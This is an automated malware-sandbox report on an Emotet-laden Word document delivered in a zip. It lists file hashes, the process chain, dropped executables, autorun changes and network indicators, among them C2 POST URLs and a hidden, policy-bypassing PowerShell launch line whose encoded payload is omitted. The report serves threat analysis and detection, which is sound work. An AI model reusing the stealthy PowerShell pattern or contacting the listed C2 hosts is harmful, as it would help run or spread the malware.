File name: UNTITLED_632586_T9336838.doc.zip

Full analysis: https://app.any.run/tasks/b7720a1e-d3ce-42b8-8114-749de9b4a376
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 19:43:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet, trojan, emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 1D10DAE8A855CDA457603F0BB59093A5
SHA1: 0C6DB1F069420F061FF5A9E529EB4E93D4243EF8
SHA256: 827AC5109E43FA522A10544D6CC1651E0CCE727391E45CB8FD9A46FB82DCE848
SSDEEP: 1536:QX7CX5ASKpQljNQbpV+79nz7mjZW2SZsEA1WSG3ahDjwJMF3JqEzTGHH/ShB9Zy1:04EiNQbpVozrsEwWSnM2tkQkSjA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 770.exe (PID: 2640)
      • soundser.exe (PID: 2592)
      • 770.exe (PID: 2748)
      • soundser.exe (PID: 4024)
      • 27TaWa.exe (PID: 3784)
      • 27TaWa.exe (PID: 2720)
      • soundser.exe (PID: 2812)
      • soundser.exe (PID: 456)
    • Emotet process was detected
      • soundser.exe (PID: 4024)
      • soundser.exe (PID: 2812)
    • EMOTET was detected
      • soundser.exe (PID: 2592)
      • soundser.exe (PID: 456)
    • Connects to CnC server
      • soundser.exe (PID: 2592)
      • soundser.exe (PID: 456)
    • Changes the autorun value in the registry
      • soundser.exe (PID: 456)
      • soundser.exe (PID: 2592)
  • SUSPICIOUS
    • PowerShell script executed
      • powershell.exe (PID: 3216)
    • Creates files in the user directory
      • powershell.exe (PID: 3216)
    • Starts Microsoft Office Application
      • WinRAR.exe (PID: 3316)
    • Executed via WMI
      • powershell.exe (PID: 3216)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 3216)
      • 770.exe (PID: 2748)
      • 27TaWa.exe (PID: 3784)
      • soundser.exe (PID: 2592)
    • Application launched itself
      • 770.exe (PID: 2640)
    • Starts itself from another location
      • 770.exe (PID: 2748)
      • 27TaWa.exe (PID: 3784)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3148)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3148)
No Malware configuration.

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP):
ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:05:20 19:43:20
ZipCRC: 0xec064e6e
ZipCompressedSize: 81243
ZipUncompressedSize: 130432
ZipFileName: UNTITLED_632586_T9336838.doc
No data.
Total processes: 45
Monitored processes: 11
Malicious processes: 9
Suspicious processes: 0

Behavior graph (interactive view available in the full report). Process nodes in the graph, in order: winrar.exe, winword.exe, powershell.exe, 770.exe, 770.exe, soundser.exe (#EMOTET), soundser.exe (#EMOTET), 27tawa.exe, 27tawa.exe, soundser.exe (#EMOTET), soundser.exe (#EMOTET).

Process information

PID 3316  WinRAR.exe  (parent process: explorer.exe)
  CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UNTITLED_632586_T9336838.doc.zip"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  User: admin
  Company: Alexander Roshal
  Integrity Level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 3148  WINWORD.EXE  (parent process: WinRAR.exe)
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 3216  powershell.exe  (parent process: wmiprvse.exe)
  CMD: powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e [base64-encoded command not included in this export]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2640  770.exe  (parent process: powershell.exe)
  CMD: "C:\Users\admin\770.exe"
  Path: C:\Users\admin\770.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2748  770.exe  (parent process: 770.exe)
  CMD: --1fcd1dee
  Path: C:\Users\admin\770.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 4024  soundser.exe  (parent process: 770.exe)
  CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
  Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2592  soundser.exe  (parent process: soundser.exe)
  CMD: --3ab57678
  Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2720  27TaWa.exe  (parent process: soundser.exe)
  CMD: "C:\Users\admin\AppData\Local\soundser\27TaWa.exe"
  Path: C:\Users\admin\AppData\Local\soundser\27TaWa.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3784  27TaWa.exe  (parent process: 27TaWa.exe)
  CMD: --54b79703
  Path: C:\Users\admin\AppData\Local\soundser\27TaWa.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2812  soundser.exe  (parent process: 27TaWa.exe)
  CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
  Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0
Total events: 2 235
Read events: 1 730
Write events: 0
Delete events: 0
Modification events: No data
Executable files: 4
Suspicious files: 3
Text files: 0
Unknown types: 7

Dropped files

PID 3148  WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Temp\CVR113E.tmp.cvr
  MD5:
  SHA256:

PID 3216  powershell.exe
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFXWN0O6X276TJDQWOJW.temp
  MD5:
  SHA256:

PID 2592  soundser.exe
  Filename: C:\Users\admin\AppData\Local\soundser\27TaWa.exe
  Type: executable
  MD5: B1994F37B1CA47638931DD05D2A92727
  SHA256: F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A

PID 3216  powershell.exe
  Filename: C:\Users\admin\770.exe
  Type: executable
  MD5: 9725D9368E642E74586456BBAD9F37B5
  SHA256: 8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9

PID 3148  WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\~$TITLED_632586_T9336838.doc
  Type: pgc
  MD5: 633F310DCFF68B75D5595D8813D077EA
  SHA256: DC4E790594796BF5E67673F904CB207C64D81E8FD70BFBD9012BEDF4D81EF376

PID 2748  770.exe
  Filename: C:\Users\admin\AppData\Local\soundser\soundser.exe
  Type: executable
  MD5: 9725D9368E642E74586456BBAD9F37B5
  SHA256: 8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9

PID 3784  27TaWa.exe
  Filename: C:\Users\admin\AppData\Local\soundser\soundser.exe
  Type: executable
  MD5: B1994F37B1CA47638931DD05D2A92727
  SHA256: F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A

PID 3148  WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E839C6D.wmf
  Type: wmf
  MD5: D9D7118DA48B5A042BBFD83E427173A5
  SHA256: 78F9FCB0F03DE13835236497993D7D91C6E491AD125138D34A88A425DC44D643

PID 3316  WinRAR.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc
  Type: document
  MD5: 016FFFBE5A3CF1E23EF25C5393B821C3
  SHA256: 9630E97DD14EE791FFCC2FAF3C333E3D19145F087026542EF5AE5A240D69E1F7

PID 3148  WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43A75F8A.wmf
  Type: wmf
  MD5: 4DA40A42C6AF15E0CF721E5CF4061D7C
  SHA256: B9F68F39C8725D5792AB11F7FB3AE8530B393EE8C71E9426C1FC9D9DC523277E
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
456 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/enable/schema/ringin/merge/ | US | binary | 148 b | malicious
2592 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/entries/ | US | binary | 65.9 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2592 | soundser.exe | 74.207.227.96:443 | | Linode, LLC | US | malicious
456 | soundser.exe | 74.207.227.96:443 | | Linode, LLC | US | malicious
3216 | powershell.exe | 69.90.66.10:443 | overcreative.com | Peer 1 Network (USA) Inc. | CA | unknown

DNS requests

Domain | IP | Reputation
overcreative.com | 69.90.66.10 | unknown

Threats

PID | Process | Class | Message
2592 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2592 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
456 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
456 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
6 ETPRO signatures available at the full report
No debug info